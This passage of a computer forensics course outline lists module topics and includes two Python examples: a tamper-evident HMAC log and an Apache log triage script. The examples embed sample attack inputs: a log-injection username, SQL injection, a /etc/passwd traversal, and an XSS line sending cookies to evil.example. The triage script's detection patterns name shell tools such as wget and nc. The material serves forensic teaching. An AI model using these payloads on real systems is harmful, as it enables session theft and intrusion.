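        record = SEP.join(sanitize(f) for f in (timestamp, client_ip, event, user))
        mac = hmac.new(self.key, (self.prev_mac + record).encode(), hashlib.sha256).hexdigest()
        self.lines.append(record + SEP + mac)
        self.prev_mac = mac
        return self.lines[-1]


def verify_chain(key, lines):
    """Index of the first record whose MAC does not chain, or None if intact.
    Insertion, deletion or edit of any record breaks every MAC after it."""
    prev = TamperEvidentLog.GENESIS
    for index, line in enumerate(lines):
        record, _, mac = line.rpartition(SEP)
        expected = hmac.new(key, (prev + record).encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(mac, expected):
            return index
        prev = mac
    return None


def demo():
    """Constructed scenario: a hostile username, then two tampering attempts."""
    key = b"constructed-demo-key"            # in practice: kept off the logging host
    log = TamperEvidentLog(key)
    log.append("2012-03-15 10:00:01", "203.0.113.7", "LOGIN OK", "alice")
    hostile_user = ("bob\r\n2012-03-15 10:00:08 | 10.0.0.9 | LOGIN OK | admin"
                    "\x1b[2K")                 # forged record + ANSI erase-line
    injected = log.append("2012-03-15 10:00:07", "203.0.113.7", "LOGIN FAIL", hostile_user)
    intact = verify_chain(key, log.lines)
    forged = list(log.lines)                  # attacker inserts a plausible record
    forged.insert(1, "2012-03-15 10:00:03 | 10.0.0.9 | LOGIN OK | admin | " + "f" * 64)
    edited = list(log.lines)                  # attacker rewrites an existing one
    edited[0] = edited[0].replace("LOGIN OK", "LOGIN FAIL")
    return {"injected_line": injected, "intact": intact,
            "forged_at": verify_chain(key, forged), "edited_at": verify_chain(key, edited)}


if __name__ == "__main__":
    for name, value in demo().items():
        print(name + ":", value)
```

The chain only proves integrity relative to the key holder, so the key belongs on the collector rather than on the host that writes the log; with the key on the same machine, an attacker who gains root can simply re-sign the rewritten file. Word-wrap abuse is the one attack in the list that escaping does not address: that is fixed in the viewer, by not wrapping at all.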
  Evidence Gathering via Sniffing
  Capturing Live Data Packets Using Wireshark
  Wireshark Screenshot
  Display Filters in Wireshark
  Additional Wireshark Filters
  Demo - Wireshark
  Acquiring Traffic Using DNS Poisoning Techniques
  Intranet DNS Spoofing (Local Network)
  Intranet DNS Spoofing (Remote Network)
  Proxy Server DNS Poisoning
  DNS Cache Poisoning
  Evidence Gathering from ARP Table
  Evidence Gathering at the Data-Link Layer: DHCP Database
  Gathering Evidence by IDS
Module Flow: Traffic Capturing and Analysis Tools
  NetworkMiner
  Tcpdump/Windump
  Intrusion Detection Tool: Snort
  How Snort Works
  IDS Policy Manager
  MaaTec Network Analyzer
  Iris Network Traffic Analyzer
  NetWitness Investigator (with screenshot)
  Colasoft Capsa Network Analyzer
  Sniff-O-Matic
  NetResident
  Network Probe
  NetFlow Analyzer
  OmniPeek Network Analyzer
  Firewall Evasion Tool: Traffic IQ Professional
  NetworkView
  CommView
  Observer
  SoftPerfect Network Protocol Analyzer
  EffeTech HTTP Sniffer
  Big-Mother
  EtherDetect Packet Sniffer
  Ntop
  EtherApe
  Demo - Nmap
  AnalogX PacketMon
  IEInspector HTTP Analyzer
  SmartSniff
  Distinct Network Monitor
  Give Me Too
  EtherSnoop
  Show Traffic
  Argus
  Documenting the Evidence Gathered on a Network
  Module 16 Review

Module 17 - Investigating Wireless Attacks (2h 5m)
Module Flow: Wireless Technologies
  Wi-Fi Usage Statistics in the US
  Wireless Networks
  Wireless Terminologies
  Wireless Components
  Types of Wireless Networks
  Wireless Standards
  MAC Filtering
  Service Set Identifier (SSID)
  Types of Wireless Encryption: WEP
  Types of Wireless Encryption: WPA
  Types of Wireless Encryption: WPA2
  WEP vs. WPA vs. WPA2
Module Flow: Wireless Attacks
  Wi-Fi Chalking
  Wi-Fi Chalking Symbols
  Access Control Attacks
  Integrity Attacks
  Confidentiality Attacks
  Availability Attacks
  Authentication Attacks
Module Flow: Investigating Wireless Attacks
  Key Points to Remember
  Steps for Investigation
  Obtain a Search Warrant
  Identify Wireless Devices at Crime Scene
  Search for Additional Devices
  Detect Rogue Access Point
  Document the Scene and Maintain a Chain of Custody
  Detect the Wireless Connections
  Methodologies to Detect Wireless Connections
  Wi-Fi Discovery Tool: inSSIDer
  GPS Mapping
  GPS Mapping Tool: WIGLE
  GPS Mapping Tool: Skyhook
  How to Discover Wi-Fi Networks Using Wardriving
  Check for MAC Filtering
  Changing the MAC Address
  Detect WAPs Using the Nessus Vulnerability Scanner
  Capturing Wireless Traffic
  Sniffing Tool: Wireshark
  Follow TCP Stream in Wireshark
  Display Filters in Wireshark
  Additional Wireshark Filters
  Determine Wireless Field Strength: FSM
  Determine Wireless Field Strength: ZAP Checker Products
  What is Spectrum Analysis?
  Map Wireless Zones and Hotspots
  Connect to the Wireless Access Point
  Access Point Data Acquisition and Analysis: Attached Devices
  Access Point Data Acquisition and Analysis: LAN TCP/IP Setup
  Access Point Data Acquisition and Analysis
  Firewall Analyzer
  Firewall Log Analyzer
  Wireless Devices Data Acquisition and Analysis
  Report Generation
Module Flow: Features of a Good Wireless Forensics Tool
  Features of a Good Wireless Forensics Tool
Module Flow: Wireless Forensics Tools
  Wi-Fi Discovery Tool: NetStumbler
  Demo - inSSIDer and NetStumbler
  Wi-Fi Discovery Tool: NetSurveyor
  Wi-Fi Discovery Tool: Vistumbler
  Wi-Fi Discovery Tool: WirelessMon
  Wi-Fi Discovery Tool: Kismet
  Wi-Fi Discovery Tool: AirPort Signal
  Wi-Fi Discovery Tools
  Wi-Fi Packet Sniffer: OmniPeek
  Wi-Fi Packet Sniffer: CommView for WiFi
  Wi-Fi USB Dongle: AirPcap
  Wi-Fi Packet Sniffer: Wireshark with AirPcap
  Wi-Fi Packet Sniffer: tcpdump
  tcpdump Commands
  Wi-Fi Packet Sniffer: KisMAC
  Aircrack-ng Suite
  Demo - Aircrack-ng
  AirMagnet WiFi Analyzer
  Wardriving Tools
  RF Monitoring Tools
  Wi-Fi Connection Manager Tools
  Wi-Fi Traffic Analyzer Tools
  Wi-Fi Raw Packet Capturing Tools / Wi-Fi Spectrum Analyzing Tools
  Module 17 Review

Module 18 - Investigating Web Attacks (2h 14m)
Module Flow: Introduction to Web Applications and Web Servers
  Web Application Security Statistics
  Web Server Market Shares
  Introduction to Web Applications
  Web Application Components
  How Web Applications Work
  Web Application Architecture
  Open Source Web Server Architecture
  Indications of a Web Attack
  Web Attack Vectors
  Why Web Servers are Compromised
  Impact of Web Server Attacks
  Website Defacement
  Case Study
Module Flow: Web Logs
  Overview of Web Logs
  Application Logs
  Internet Information Services (IIS) Logs
  IIS Web Server Architecture
  IIS Log File Format
  Apache Web Server Logs
  DHCP Server Logs
Module Flow: Web Attacks
  Web Attacks - 1
  Web Attacks - 2
  Unvalidated Input
  Parameter/Form Tampering
  Directory Traversal
  Security Misconfiguration
  Injection Flaws
  SQL Injection Attacks
  Command Injection Attacks
  Command Injection Example
  File Injection Attack
  What is LDAP Injection?
  How LDAP Injection Works
  Hidden Field Manipulation Attack
  Cross-Site Scripting (XSS) Attacks
  How XSS Attacks Work
  Cross-Site Request Forgery (CSRF) Attack
  How CSRF Attacks Work
  Web Application Denial-of-Service (DoS) Attack
  Denial of Service (DoS) Examples
  Buffer Overflow Attacks
  Cookie/Session Poisoning
  How Cookie Poisoning Works
  Session Fixation Attack
  Insufficient Transport Layer Protection
  Improper Error Handling
  Insecure Cryptographic Storage
  Broken Authentication and Session Management
  Unvalidated Redirects and Forwards
  DMZ Protocol Attack / Zero Day Attack
  Log Tampering
  URL Interpretation and Impersonation Attack
  Web Services Attack
  Web Services Footprinting Attack
  Web Services XML Poisoning
  Web Server Misconfiguration Example
  HTTP Response Splitting Attack
  Web Cache Poisoning Attack
  HTTP Response Hijacking
  SSH Brute-Force Attack
  Man-in-the-Middle Attack
  Defacement Using DNS Compromise
Module Flow: Web Attack Investigation
  Investigating Web Attacks
  Investigating Web Attacks in Windows-Based Servers
  Investigating IIS Logs
  Investigating Apache Logs
  Example of FTP Compromise
  Investigating FTP Servers
  Investigating Static and Dynamic IP Addresses
  Sample DHCP Audit Log File
  Investigating Cross-Site Scripting (XSS)
  Investigating SQL Injection Attacks
  Pen-Testing CSRF Validation Fields
  Investigating Code Injection Attack
  Investigating Cookie Poisoning Attack
  Detecting Buffer Overflow
  Investigating Authentication Hijacking
  Web Page Defacement
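Added example (not course material): the first pass an examiner makes over an Apache access log for Module 18's "Investigating Apache Logs", "Investigating SQL Injection Attacks" and "Investigating Cross-Site Scripting (XSS)" slides. It parses the combined log format, URL-decodes the request target (Apache records it exactly as the client sent it, and attackers encode their payloads), matches the decoded target against signatures for SQL injection, XSS, directory traversal and command injection, and tallies hits per source address. The six log lines are constructed for the demo; the signature set is a starting point this example supplies, not a complete ruleset.

```python
import re
from urllib.parse import unquote

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

# Signatures are applied to the decoded request target (path and query string).
SIGNATURES = {
    "sqli": re.compile(r"union\s+select|or\s+1\s*=\s*1|'\s*or\s+'|information_schema|--\s*$|sleep\(", re.I),
    "xss": re.compile(r"<script|javascript:|on(?:error|load|mouseover)\s*=", re.I),
    "traversal": re.compile(r"\.\./|\.\.\\|/etc/passwd|boot\.ini", re.I),
    "cmdi": re.compile(r"[;|`]\s*(?:cat|ls|id|whoami|wget|curl|nc)\b|\$\(", re.I),
}

# Constructed sample log (RFC 5737 documentation addresses), not a real capture.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Mar/2012:10:03:21 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Mar/2012:10:03:25 +0000] "GET /product.php?id=7%27%20OR%201%3D1-- HTTP/1.1" 200 18230 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [15/Mar/2012:10:04:02 +0000] "GET /download.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843 "-" "curl/7.21"',
    '198.51.100.23 - - [15/Mar/2012:10:04:40 +0000] "GET /search.php?q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '192.0.2.5 - - [15/Mar/2012:10:05:10 +0000] "POST /login.php HTTP/1.1" 302 - "http://shop.example/login.php" "Mozilla/5.0"',
    'garbage line without structure',
]


def decode_target(target):
    """Decode twice so a double-encoded payload (%2527 -> %27 -> ') is also seen."""
    return unquote(unquote(target))


def parse_line(line):
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def triage(lines):
    """Return (findings, malformed_count, hits_per_ip). Each finding records the
    line number, source, time, response status and every signature that matched,
    so the examiner can see whether a 200 came back for an injection attempt."""
    findings, malformed, per_ip = [], 0, {}
    for number, line in enumerate(lines, 1):
        entry = parse_line(line.rstrip("\n"))
        if entry is None:
            malformed += 1              # truncated or tampered lines deserve a look too
            continue
        decoded = decode_target(entry["target"])
        categories = [name for name, sig in SIGNATURES.items() if sig.search(decoded)]
        if categories:
            findings.append({"line": number, "ip": entry["ip"], "time": entry["time"],
                             "status": int(entry["status"]), "categories": categories,
                             "decoded": decoded})
            per_ip[entry["ip"]] = per_ip.get(entry["ip"], 0) + 1
    return findings, malformed, per_ip


def demo():
    return triage(SAMPLE_LOG)


if __name__ == "__main__":
    findings, malformed, per_ip = demo()
    for f in findings:
        print("line %d %s %s -> %s (status %d)" % (f["line"], f["ip"], f["categories"], f["decoded"], f["status"]))
    print("malformed lines:", malformed, "| hits per IP:", per_ip)
```

The status code matters as much as the pattern: the SQL injection line returned 200 with a larger body than the normal page, which is the cue to pull the database and application logs for the same second, and the request body of POST submissions is not in the access log at all, so attacks sent as form fields need mod_security or application logging to be visible.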
  Investigating DNS Poisoning
  Intrusion Detection
  Security Strategies for Web Applications
  Checklist for Web Security
Module Flow: Web Attack Detection Tools
  Demo - Nessus
  Web Application Security Tool: Acunetix Web Vulnerability Scanner
  Web Application Security Tool: Falcove Web Vulnerability Scanner
  Web Application Security Tool: Netsparker
  Web Application Security Tool: N-Stalker Web Application Security Scanner
  Web Application Security Tool: Sandcat
  Web Application Security Tool: Wikto
  Web Application Security Tool: WebWatchBot
  Web Application Security Tool: OWASP ZAP
  Web Application Security Tool: SecuBat Vulnerability Scanner
  Web Application Security Tool: Websecurify
  Web Application Security Tool: HackAlert
  Web Application Security Tool: WebCruiser
  Web Application Firewall: dotDefender
  Web Application Firewall: IBM AppScan
  Web Application Firewall: ServerDefender VP
  Web Log Viewer: Deep Log Analyzer
  Web Log Viewer: WebLog Expert
  Web Log Viewer: AlterWind Log Analyzer
  Web Log Viewer: Webalizer
  Web Log Viewer: eWebLog Analyzer
  Web Log Viewer: Apache Logs Viewer (ALV)
  Web Attack Investigation Tool: AWStats
  Web Attack Investigation Tool: Paros Proxy
  Web Attack Investigation Tool: Scrawlr
Module Flow: Tools for Locating IP Addresses
  Whois Lookup
  Whois Lookup Result
  SmartWhois
  ActiveWhois
  LanWhoIs
  CountryWhois
  CallerIP
  Real Hide IP
  Demo - Real Hide IP
  IP Address Manager
  Pandora FMS
  Demo - Whois Lookup
  Module 18 Review

Module 19 - Tracking Emails and Investigating Email Crimes (1h 40m)
Module Flow: Email System Basics
  Email Terminology
  Email System
  Email Clients
  Email Server
  SMTP Server
  POP3 and IMAP Servers
  Email Message
  Importance of Electronic Records Management
Module Flow: Email Crimes
  Email Crime
  Email Spamming
  Mail Bombing/Mail Storm
  Phishing
  Email Spoofing
  Crime via Chat Room
  Identity Fraud/Chain Letter
Module Flow: Email Headers
  Example of Email Header
  List of Common Headers
Module Flow: Steps to Investigate
  Why Investigate Emails?
  Investigating Email Crime and Violation
  Obtain a Search Warrant and Seize the Computer and Email Account
  Obtain a Bit-by-Bit Image of Email Information
  Examine Email Headers
  Viewing Email Headers in Microsoft Outlook
  Viewing Email Headers in AOL
  Viewing Email Headers in Hotmail
  Viewing Email Headers in Gmail
  Viewing Headers in Yahoo Mail
  Forging Headers
  Analyzing Email Headers
  Email Header Fields
  Received: Headers
  Demo - Email Headers
  Microsoft Outlook Mail
  Examining Additional Files (.pst or .ost Files)
  Checking the Email Validity
  Examine the Originating IP Address
  Tracing Back
  Tracing Back Web-Based Email
  Email Archives
  Content of Email Archives
  Local Archive
  Server Storage Archive
  Forensic Acquisition of Email Archive
  Deleted Email Recovery
Module Flow: Email Forensics Tools
  Stellar Phoenix Deleted Email Recovery
  Recover My Email
  Outlook Express Recovery
  Zmeil
  Quick Recovery for MS Outlook
  Email Detective
  Email Trace - Email Tracking
  R-Mail
  FINALeMAIL
  eMailTrackerPro
  Forensic Tool Kit (FTK)
  Paraben's E-mail Examiner
  Paraben's Network E-mail Examiner
  DiskInternals Outlook Express Repair
  Abuse.Net
  MailDetective Tool
Module Flow: Laws and Acts against Email Crimes
  U.S. Laws Against Email Crime: CAN-SPAM Act
  18 U.S.C. 2252A
  18 U.S.C. 2252B
  Email Crime Law in Washington: RCW 19.190.020
  Module 19 Review

Module 20 - Mobile Forensics (1h 58m)
Module Flow: Mobile Phones
  Smartphone Sales Statistics 2010/2011
  Mobile Phone
  Different Mobile Devices
  Hardware Characteristics of Mobile Devices
  Software Characteristics of Mobile Devices
  Components of Cellular Network
  Cellular Network
  Different Cellular Networks
Module Flow: Mobile Operating Systems
  Mobile Operating Systems
  Types of Mobile Operating Systems
  webOS
  webOS System Architecture
  Symbian OS
  Symbian OS Architecture
  Android OS
  Android OS Architecture
  RIM BlackBerry OS
  Windows Phone 7
  Windows Phone 7 Architecture
  Apple iOS
Module Flow: Mobile Forensics
  What a Criminal Can Do with Mobile Phones
  Mobile Forensics
  Mobile Forensics Challenges
  Forensic Information in Mobile Phones
  Memory Considerations in Mobiles
  Subscriber Identity Module (SIM)
  SIM File System
  Integrated Circuit Card Identification (ICCID)
  International Mobile Equipment Identifier (IMEI)
  Electronic Serial Number (ESN)
  Precautions to Be Taken Before Investigation
Module Flow: Mobile Forensics Process
  Mobile Forensics Process
  Collecting the Evidence
  Points to Remember While Collecting the Evidence
  Collecting an iPod/iPhone Connected to a Computer
  Demo - Mac-based iPods
  Demo - Windows-based iPods
  Document the Scene and Preserve the Evidence
  Imaging and Profiling
  Acquire the Information
  Device Identification
  Acquire Data from SIM Cards
  Acquire Data from Unobstructed Mobile Devices
  Acquire the Data from Obstructed Mobile Devices
  Acquire Data from Memory Cards
  Acquire Data from Synched Devices
  Gather Data from Network Operator
  Check Call Data Records (CDRs)
  Gather Data from SQLite Record
  Analyze the Information
  Generate Report
Module Flow: Mobile Forensics Software Tools
  Oxygen Forensic Suite 2011
  MOBILedit! Forensic (with screenshot)
  BitPim
  SIM Analyzer
  SIMCon
  SIM Card Data Recovery
  Memory Card Data Recovery
  Device Seizure
  SIM Card Seizure
  ART (Automatic Reporting Tool)
  iPod Data Recovery Software
  Recover My iPod
  PhoneView
  Elcomsoft Blackberry Backup Explorer
  Oxygen Phone Manager II
  Sanmaxi SIM Recoverer
  Mobile Forensics Tools
  Demo - Mobile Forensic Software
Module Flow: Mobile Forensics Hardware Tools
  Secure View Kit
  Deployable Device Seizure (DDS)
  Paraben's Mobile Field Kit
  PhoneBase
  XACT System
  Logicube CellDEK
  Logicube CellDEK TEK
  RadioTactics ACESO
  UME-36Pro - Universal Memory Exchanger
  Cellebrite UFED System - Universal Forensic Extraction Device
  ZRT 2
  ICD 5200
  ICD 1300
  Module 20 Review

Module 21 - Investigative Reports (1h 16m)
Module Flow: Computer Forensics Report
  Computer Forensics Report
  Salient Features of a Good Report
  Aspects of a Good Report
Module Flow: Computer Forensics Report Template
  Computer Forensics Report Template
  Simple Format of the Chain of Custody Document
  Chain of Custody Forms
  Evidence Collection Form
  Computer Evidence Worksheet
  Hard Drive Evidence Worksheet
  Removable Media Worksheet
Module Flow: Investigative Report Writing
  Report Classification
  Layout of an Investigative Report
  Layout of an Investigative Report: Numbering
  Report Specifications
  Guidelines for Writing a Report
  Use of Supporting Material
  Importance of Consistency
  Investigative Report Format
  Attachments and Appendices
  Include Metadata
  Signature Analysis
  Investigation Procedures
  Collecting Physical and Demonstrative Evidence
  Collecting Testimonial Evidence
  Do's and Don'ts of Computer Forensics Investigations
  Case Report Writing and Documentation
  Creating a Report to Attach to the Media Analysis Worksheet
  Best Practices for Investigators
Module Flow: Sample Forensics Report
  Sample Forensics Report
  Sample Forensics Report 1 (1 of 5 through 5 of 5)
  Sample Forensics Report 2 (1 of 3 through 3 of 3)
Module Flow: Report Writing Using Tools
  Writing Report Using FTK (1 of 10 through 10 of 10)
  Writing Report Using ProDiscover (1 of 7 through 7 of 7)
  Demo - Investigative Reports
  Module 21 Review

Module 22 - Becoming an Expert Witness
Module Flow: Expert Witness
  What is an Expert Witness?
  Role of an Expert Witness
  What Makes a Good Expert Witness?
Module Flow: Types of Expert Witnesses
  Types of Expert Witnesses
  Computer Forensics Experts
  Role of Computer Forensics Expert
  Medical & Psychological Experts
  Civil Litigation Experts
  Construction & Architecture Experts
  Criminal Litigation Experts
Module Flow: Scope of Expert Witness Testimony
  Scope of Expert Witness Testimony
  Technical Witness vs.
Expert Witness Preparing for Testimony Module Flow: Evidence Processing Evidence Preparation and Documentation Evidence Processing Steps (Cont'd) Evidence Processing Steps Checklists for Processing Evidence Examining Computer Evidence Prepare the Report Evidence Presentation Module Flow: Rules for Expert Witness Rules Pertaining to an Expert Witness's Qualifications (Cont'd) Rules Pertaining to an Expert Witness' Qualification Daubert Standard Frye Standard Importance of Resume Testifying in the Court The Order of Trial Proceedings Module Flow: General Ethics While Testifying General Ethics While Testifying Importance of Graphics in a Testimony 1h Helping your Attorney Avoiding Testimony Issues Testifying during Direct Examination (Cont'd) Testifying during Direct Examination Testifying during Cross-Examination Deposing Recognizing Deposition Problems Guidelines to Testifying at a Deposition Dealing with Media Finding a Computer Forensics Expert Learn More… Module 22 Review Course Closure Total Duration: 44h 56m